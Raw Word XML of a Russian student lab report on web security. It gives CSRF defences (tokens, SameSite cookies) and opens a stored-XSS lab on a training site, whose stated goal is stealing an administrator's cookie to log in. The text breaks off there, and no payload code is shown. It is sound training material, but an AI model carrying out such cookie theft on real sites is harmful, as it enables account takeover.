    <w:p w14:paraId="626EC7CC" w14:textId="3D22CB03" w:rsidR="0043505F" w:rsidRPr="006B3AE2" w:rsidRDefault="0043505F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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30B1ECEA" wp14:editId="7CD9AAD9">
            <wp:extent cx="5733415" cy="2216150"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19" name="Рисунок 1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76A9" w14:textId="4FAE23FF" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF2A11D" w14:textId="77777777" w:rsidR="00C6447B" w:rsidRPr="006B3AE2" w:rsidRDefault="00C6447B" w:rsidP="00C6447B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AB9B8" w14:textId="134F691A" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00C6447B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB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687FC423" wp14:editId="08946DAD">
            <wp:extent cx="4991100" cy="5219700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Рисунок 1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1247" w14:textId="701BA661" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCAD710" w14:textId="53A97C85" w:rsidR="00C6447B" w:rsidRPr="006B3AE2" w:rsidRDefault="00C6447B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281ACFF6" w14:textId="77777777" w:rsidR="00C6447B" w:rsidRPr="006B3AE2" w:rsidRDefault="00C6447B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1A247A" w14:textId="77777777" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD31824" w14:textId="1EF656D5" w:rsidR="0026286E" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF0CFE" w14:textId="3958A15C" w:rsidR="0026286E" w:rsidRPr="006B3AE2" w:rsidRDefault="0026286E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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6BA64768" wp14:editId="5533A548">
            <wp:extent cx="5733415" cy="1898650"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="20" name="Рисунок 2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16F9" w14:textId="31413413" w:rsidR="0026286E" w:rsidRPr="006B3AE2" w:rsidRDefault="0026286E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7787C2" w14:textId="59C373EB" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA0887" w14:textId="5366DF08" w:rsidR="0026286E" w:rsidRPr="006B3AE2" w:rsidRDefault="0026286E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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5F60421E" wp14:editId="490A9991">
            <wp:extent cx="3467100" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21" name="Рисунок 2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C69B" w14:textId="77777777" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C871777" w14:textId="3D1CDB09" w:rsidR="00356E1A" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B558793" w14:textId="59E661DB" w:rsidR="00356E1A" w:rsidRDefault="00D622E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450491" wp14:editId="6128B2A5">
            <wp:extent cx="5733415" cy="241935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6811" w14:textId="111E33C0" w:rsidR="00D622E5" w:rsidRPr="00D622E5" w:rsidRDefault="00D622E5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>8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBBF70B" w14:textId="6419751D" w:rsidR="00D622E5" w:rsidRPr="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB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78A803D1" wp14:editId="22A1D2A9">
            <wp:extent cx="5733415" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="22" name="Рисунок 2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724C" w14:textId="675654D8" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00D622E5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9</w:t>
      </w:r>
      <w:r w:rsidR="00591AF0" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CB1A8" w14:textId="0BEDC1D8" w:rsidR="00EF517B" w:rsidRPr="006B3AE2" w:rsidRDefault="00D622E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B323949" wp14:editId="4EC7D331">
            <wp:extent cx="5733415" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="63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1E70" w14:textId="2F8F3620" w:rsidR="00EF517B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF517B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241C487C" w14:textId="0B29ADA0" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:widowControl w:val="0"/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Рекомендации, </w:t>
      </w:r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к</w:t>
      </w:r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ак защищаться от CSRF</w:t>
      </w:r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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B750E8" w14:textId="40A79937" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="646464"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB94738" w14:textId="457B84FE" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSRF-токен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ADB103" w14:textId="2B5AC776" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самый надёжный способ защиты от CSRF-атак - включить CSRF-токен в соответствующие запросы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A2D401" w14:textId="05AC17EA" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4731EB32" w14:textId="7DDF6B6A" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Same-Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6118C58A" w14:textId="77777777" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88" w:rsidP="00394C88">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve">Атаки CSRF возможны только потому, что файлы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve"> всегда отправляются с любыми запросами, отправленными в конкретный источник, связанный с этим файлом </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve">. Вы можете установить флаг для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve">, который превращает его в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
        </w:rPr>
        <w:t xml:space="preserve"> того же сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E0E8D" w14:textId="5AEBDFBA" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="646464"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F2C6E7" w14:textId="77777777" w:rsidR="00ED58E2" w:rsidRPr="006B3AE2" w:rsidRDefault="00ED58E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="646464"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DD71C8" w14:textId="77777777" w:rsidR="00394C88" w:rsidRPr="006B3AE2" w:rsidRDefault="00394C88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036686FA" w14:textId="16EA826F" w:rsidR="00EF517B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF517B" w:rsidP="00EF517B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336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B3AE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Лабораторная работа </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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№ </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
      <w:r w:rsidR="00DF7264" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54D587" w14:textId="750E3334" w:rsidR="00EF517B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF517B" w:rsidP="00EF517B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DF7264" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00DF7264" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF7264" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D503F58" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340D6F8B" w14:textId="5884242E" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB" w:rsidP="003008AB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind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3AE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XSS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE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Cross-Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE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B3AE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Scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE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6B3A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– одна из наиболее часто встречающихся уязвимостей. Суть уязвимости сводится к внедрению вредоносного кода на страницу и его дальнейшее исполнение с целью получения какого-то конкретного результата, зависит от типа XSS и фантазии злоумышленника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7735A7" w14:textId="77777777" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB" w:rsidP="003008AB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind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3AE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Хранимые (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE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Stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE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) XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606CD6BF" w14:textId="5A522075" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB" w:rsidP="003008AB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind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3A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Возникают, когда приложение получает данные из ненадежного источника и небезопасным образом включает эти данные в свои последующие HTTP-ответы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB6D4C5" w14:textId="77777777" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="003008AB" w:rsidP="00DF7264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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A88F9D6" w14:textId="6FB6B7D2" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E54CF3" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264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</w:p>
    <w:p w14:paraId="19560383" w14:textId="69584A04" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Мы создали ещё один сайт (</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5001</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="313131"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) для поиска кандидатов и проверяем его в постоянном режиме администратором. Проверьте, насколько безопасен наш подход по поиску кандидатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D17163" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7B0AA" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF726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B3A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415176" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF726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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Период тестирования: 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20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12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2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEDE55" w14:textId="77331560" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="a9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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="00A928"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A041AC7" w14:textId="77777777" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264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5CF6CEC0" w14:textId="72291980" w:rsidR="00EF517B" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind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Описание действий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решение</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3A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DC42A01" w14:textId="598C2E6C" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00DF7264" w:rsidP="00DF7264">
      <w:pPr>
        <w:ind w:firstLine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DDB8B4" w14:textId="192C4C63" w:rsidR="00DF7264" w:rsidRPr="006B3AE2" w:rsidRDefault="00500045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Цель работы получить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cookie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 ним авторизоваться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E533CCF" w14:textId="5F81E7D5" w:rsidR="003008AB" w:rsidRPr="006B3AE2" w:rsidRDefault="00500045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Сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="007025E7">
          <w:rPr>
            <w:rStyle w:val="a9"/>
